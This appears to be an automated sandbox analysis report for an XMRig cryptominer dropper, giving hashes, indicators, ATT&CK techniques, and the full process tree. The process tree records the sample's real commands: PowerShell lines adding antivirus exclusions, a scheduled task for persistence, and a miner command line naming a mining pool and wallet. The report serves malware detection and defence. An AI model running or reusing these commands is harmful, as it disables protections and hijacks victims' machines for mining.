xmrig | 91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4

Analysis

max time kernel
143s
max time network
152s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
01/12/2022, 11:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe
Size

1.4MB
MD5

79ed5887d73f0a28bbd5866195c400e2
SHA1

faa754e2b851034bd3a62f284e6a6c095be9e7b3
SHA256

91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4
SHA512

8acd3f22463b9e293e9ccb81a3c3af2a20c4ed3509cf7353f08d8261b688be9b445936085d3ff2d614d66d3a7c0cd285949b71aaddcc2dbd449e8dbd9fb5a20a
SSDEEP

24576:US9mE7v4bcAjUha0rtSbm3IFEFA3uZ2PbM+fvvIFR7NyGPCBzO0:US9mE7vGcAUhntum3IFE4PIy3IY5S0

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/2728-304-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2728-305-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/2728-306-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2728-307-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2728-309-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2728-313-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
3664	PWOJ.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3664 set thread context of 2728	3664	PWOJ.exe	83

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4764	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2960	timeout.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe
2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe
3456	powershell.exe
3684	powershell.exe
3684	powershell.exe
3456	powershell.exe
3456	powershell.exe
3684	powershell.exe
3664	PWOJ.exe
3664	PWOJ.exe
4484	powershell.exe
4484	powershell.exe
4388	powershell.exe
4388	powershell.exe
4484	powershell.exe
4388	powershell.exe
3664	PWOJ.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeIncreaseQuotaPrivilege	3684	powershell.exe
Token: SeSecurityPrivilege	3684	powershell.exe
Token: SeTakeOwnershipPrivilege	3684	powershell.exe
Token: SeLoadDriverPrivilege	3684	powershell.exe
Token: SeSystemProfilePrivilege	3684	powershell.exe
Token: SeSystemtimePrivilege	3684	powershell.exe
Token: SeProfSingleProcessPrivilege	3684	powershell.exe
Token: SeIncBasePriorityPrivilege	3684	powershell.exe
Token: SeCreatePagefilePrivilege	3684	powershell.exe
Token: SeBackupPrivilege	3684	powershell.exe
Token: SeRestorePrivilege	3684	powershell.exe
Token: SeShutdownPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeSystemEnvironmentPrivilege	3684	powershell.exe
Token: SeRemoteShutdownPrivilege	3684	powershell.exe
Token: SeUndockPrivilege	3684	powershell.exe
Token: SeManageVolumePrivilege	3684	powershell.exe
Token: 33	3684	powershell.exe
Token: 34	3684	powershell.exe
Token: 35	3684	powershell.exe
Token: 36	3684	powershell.exe
Token: SeIncreaseQuotaPrivilege	3456	powershell.exe
Token: SeSecurityPrivilege	3456	powershell.exe
Token: SeTakeOwnershipPrivilege	3456	powershell.exe
Token: SeLoadDriverPrivilege	3456	powershell.exe
Token: SeSystemProfilePrivilege	3456	powershell.exe
Token: SeSystemtimePrivilege	3456	powershell.exe
Token: SeProfSingleProcessPrivilege	3456	powershell.exe
Token: SeIncBasePriorityPrivilege	3456	powershell.exe
Token: SeCreatePagefilePrivilege	3456	powershell.exe
Token: SeBackupPrivilege	3456	powershell.exe
Token: SeRestorePrivilege	3456	powershell.exe
Token: SeShutdownPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeSystemEnvironmentPrivilege	3456	powershell.exe
Token: SeRemoteShutdownPrivilege	3456	powershell.exe
Token: SeUndockPrivilege	3456	powershell.exe
Token: SeManageVolumePrivilege	3456	powershell.exe
Token: 33	3456	powershell.exe
Token: 34	3456	powershell.exe
Token: 35	3456	powershell.exe
Token: 36	3456	powershell.exe
Token: SeDebugPrivilege	3664	PWOJ.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeIncreaseQuotaPrivilege	4484	powershell.exe
Token: SeSecurityPrivilege	4484	powershell.exe
Token: SeTakeOwnershipPrivilege	4484	powershell.exe
Token: SeLoadDriverPrivilege	4484	powershell.exe
Token: SeSystemProfilePrivilege	4484	powershell.exe
Token: SeSystemtimePrivilege	4484	powershell.exe
Token: SeProfSingleProcessPrivilege	4484	powershell.exe
Token: SeIncBasePriorityPrivilege	4484	powershell.exe
Token: SeCreatePagefilePrivilege	4484	powershell.exe
Token: SeBackupPrivilege	4484	powershell.exe
Token: SeRestorePrivilege	4484	powershell.exe
Token: SeShutdownPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeSystemEnvironmentPrivilege	4484	powershell.exe
Token: SeRemoteShutdownPrivilege	4484	powershell.exe
Token: SeUndockPrivilege	4484	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2728	vbc.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 3456	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	66
PID 2736 wrote to memory of 3456	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	66
PID 2736 wrote to memory of 3684	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	69
PID 2736 wrote to memory of 3684	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	69
PID 2736 wrote to memory of 4360	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	70
PID 2736 wrote to memory of 4360	2736	91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe	70
PID 4360 wrote to memory of 2960	4360	cmd.exe	72
PID 4360 wrote to memory of 2960	4360	cmd.exe	72
PID 4360 wrote to memory of 3664	4360	cmd.exe	74
PID 4360 wrote to memory of 3664	4360	cmd.exe	74
PID 3664 wrote to memory of 4484	3664	PWOJ.exe	75
PID 3664 wrote to memory of 4484	3664	PWOJ.exe	75
PID 3664 wrote to memory of 4388	3664	PWOJ.exe	78
PID 3664 wrote to memory of 4388	3664	PWOJ.exe	78
PID 3664 wrote to memory of 4612	3664	PWOJ.exe	79
PID 3664 wrote to memory of 4612	3664	PWOJ.exe	79
PID 4612 wrote to memory of 4764	4612	cmd.exe	81
PID 4612 wrote to memory of 4764	4612	cmd.exe	81
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83
PID 3664 wrote to memory of 2728	3664	PWOJ.exe	83

C:\Users\Admin\AppData\Local\Temp\91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe
"C:\Users\Admin\AppData\Local\Temp\91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCA88.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4360
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2960
- - C:\ProgramData\netcore\PWOJ.exe
    "C:\ProgramData\netcore\PWOJ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4388
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4612
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4764
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:2728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\netcore\PWOJ.exe

Filesize
1.4MB

MD5
79ed5887d73f0a28bbd5866195c400e2

SHA1
faa754e2b851034bd3a62f284e6a6c095be9e7b3

SHA256
91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4

SHA512
8acd3f22463b9e293e9ccb81a3c3af2a20c4ed3509cf7353f08d8261b688be9b445936085d3ff2d614d66d3a7c0cd285949b71aaddcc2dbd449e8dbd9fb5a20a

Download Submit
C:\ProgramData\netcore\PWOJ.exe

Filesize
1.4MB

MD5
79ed5887d73f0a28bbd5866195c400e2

SHA1
faa754e2b851034bd3a62f284e6a6c095be9e7b3

SHA256
91feef3627d2c6b4321190e12ed19726909fe8aa10fac6e84048f90d2a146ce4

SHA512
8acd3f22463b9e293e9ccb81a3c3af2a20c4ed3509cf7353f08d8261b688be9b445936085d3ff2d614d66d3a7c0cd285949b71aaddcc2dbd449e8dbd9fb5a20a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
667ad5c05e78f9f6b83619596a0cd7ff

SHA1
d3ab90c11a8ac26139ad513b7f78a256fcb051b2

SHA256
449889d7d7cc2ab95b20f3b742236c3bc13b214619e3af99603ec7ff36f7fb7e

SHA512
2560b56e7b7b874f52275186f7e65d59b8ca5df0e3c9401ae1b16689530113d2a077aa2a0ae4aebcc4bf9f4ced3ef74f0bae91940a492a0a60d67788b778eb31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
667ad5c05e78f9f6b83619596a0cd7ff

SHA1
d3ab90c11a8ac26139ad513b7f78a256fcb051b2

SHA256
449889d7d7cc2ab95b20f3b742236c3bc13b214619e3af99603ec7ff36f7fb7e

SHA512
2560b56e7b7b874f52275186f7e65d59b8ca5df0e3c9401ae1b16689530113d2a077aa2a0ae4aebcc4bf9f4ced3ef74f0bae91940a492a0a60d67788b778eb31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbe5eb69c014142c032980b00cf98e9b

SHA1
3cc9acb0cf6fe73ba6bca8a04a8edc73633c08fe

SHA256
c5bf0a3a60e8961b5832c689a95aaec76f96d913a389b2149813df08217b24b5

SHA512
1c9fdf0b2e91f01f56f8195680c4eada5ea2f4f774f23aa5aeb86260b96d7e629a4415c2adeef2bd0ecd493a3324caa33f2a8f9776337f401fedf03d0134c2f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCA88.tmp.bat

Filesize
140B

MD5
0c2990fe6b9178a91e72a520e1bf7c1a

SHA1
7c01f5357b5270024cc7811e517f629459e88caa

SHA256
3e637bf5c6eb18c420a62384808edfe047512ebd82c07c9935d52cade927988f

SHA512
84025964def7bd455438991075b220dab8d0bd37bfc7276a6c6d4f58d1a458f6e94bb6e72996aa14cad2464737a8fec3672b3bd64205cd7a52d05c0ab4c5f3d8

Download Submit
memory/2728-304-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2728-307-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2728-308-0x000002B816300000-0x000002B816320000-memory.dmp

Filesize
128KB

Download
memory/2728-309-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2728-306-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2728-312-0x000002B8A84A0000-0x000002B8A84C0000-memory.dmp

Filesize
128KB

Download
memory/2728-317-0x000002B8A8AF0000-0x000002B8A8B10000-memory.dmp

Filesize
128KB

Download
memory/2728-316-0x000002B8A8B10000-0x000002B8A8B30000-memory.dmp

Filesize
128KB

Download
memory/2728-315-0x000002B8A8AF0000-0x000002B8A8B10000-memory.dmp

Filesize
128KB

Download
memory/2728-314-0x000002B8A8B10000-0x000002B8A8B30000-memory.dmp

Filesize
128KB

Download
memory/2728-313-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2736-129-0x0000000001320000-0x00000000014F2000-memory.dmp

Filesize
1.8MB

Download
memory/2736-126-0x00007FFB6B970000-0x00007FFB6B981000-memory.dmp

Filesize
68KB

Download
memory/2736-151-0x00000000012B0000-0x00000000012F3000-memory.dmp

Filesize
268KB

Download
memory/2736-150-0x0000000001320000-0x00000000014F2000-memory.dmp

Filesize
1.8MB

Download
memory/2736-122-0x00007FFB6F180000-0x00007FFB6F21D000-memory.dmp

Filesize
628KB

Download
memory/2736-132-0x00007FFB62CE0000-0x00007FFB62E0C000-memory.dmp

Filesize
1.2MB

Download
memory/2736-131-0x0000000001320000-0x00000000014F2000-memory.dmp

Filesize
1.8MB

Download
memory/2736-128-0x00007FFB54000000-0x00007FFB549EC000-memory.dmp

Filesize
9.9MB

Download
memory/2736-130-0x00000000012B0000-0x00000000012F3000-memory.dmp

Filesize
268KB

Download
memory/2736-127-0x00007FFB62F50000-0x00007FFB63047000-memory.dmp

Filesize
988KB

Download
memory/2736-123-0x00007FFB6EBA0000-0x00007FFB6EC4E000-memory.dmp

Filesize
696KB

Download
memory/2736-125-0x00007FFB6C9D0000-0x00007FFB6CB1A000-memory.dmp

Filesize
1.3MB

Download
memory/2736-121-0x00007FFB630A0000-0x00007FFB6313C000-memory.dmp

Filesize
624KB

Download
memory/2736-124-0x00007FFB6CB30000-0x00007FFB6CB57000-memory.dmp

Filesize
156KB

Download
memory/3664-299-0x00007FFB62E60000-0x00007FFB62E85000-memory.dmp

Filesize
148KB

Download
memory/3664-213-0x00007FFB6F180000-0x00007FFB6F21D000-memory.dmp

Filesize
628KB

Download
memory/3664-225-0x0000000000970000-0x00000000009B3000-memory.dmp

Filesize
268KB

Download
memory/3664-210-0x0000000000AB0000-0x0000000000C82000-memory.dmp

Filesize
1.8MB

Download
memory/3664-212-0x00007FFB630A0000-0x00007FFB6313C000-memory.dmp

Filesize
624KB

Download
memory/3664-220-0x0000000000AB0000-0x0000000000C82000-memory.dmp

Filesize
1.8MB

Download
memory/3664-221-0x00007FFB62CE0000-0x00007FFB62E0C000-memory.dmp

Filesize
1.2MB

Download
memory/3664-295-0x00007FFB6B7B0000-0x00007FFB6B7D5000-memory.dmp

Filesize
148KB

Download
memory/3664-219-0x00007FFB54000000-0x00007FFB549EC000-memory.dmp

Filesize
9.9MB

Download
memory/3664-218-0x00007FFB62F50000-0x00007FFB63047000-memory.dmp

Filesize
988KB

Download
memory/3664-300-0x00007FFB4B6C0000-0x00007FFB4B78C000-memory.dmp

Filesize
816KB

Download
memory/3664-301-0x00007FFB6F110000-0x00007FFB6F17C000-memory.dmp

Filesize
432KB

Download
memory/3664-302-0x00007FFB6AF30000-0x00007FFB6AF67000-memory.dmp

Filesize
220KB

Download
memory/3664-303-0x0000000000AB0000-0x0000000000C82000-memory.dmp

Filesize
1.8MB

Download
memory/3664-217-0x00007FFB6B970000-0x00007FFB6B981000-memory.dmp

Filesize
68KB

Download
memory/3664-216-0x00007FFB6C9D0000-0x00007FFB6CB1A000-memory.dmp

Filesize
1.3MB

Download
memory/3664-215-0x00007FFB6CB30000-0x00007FFB6CB57000-memory.dmp

Filesize
156KB

Download
memory/3664-214-0x00007FFB6EBA0000-0x00007FFB6EC4E000-memory.dmp

Filesize
696KB

Download
memory/3684-152-0x0000027AA3290000-0x0000027AA3306000-memory.dmp

Filesize
472KB

Download
memory/3684-143-0x0000027A8AAA0000-0x0000027A8AAC2000-memory.dmp

Filesize
136KB

Download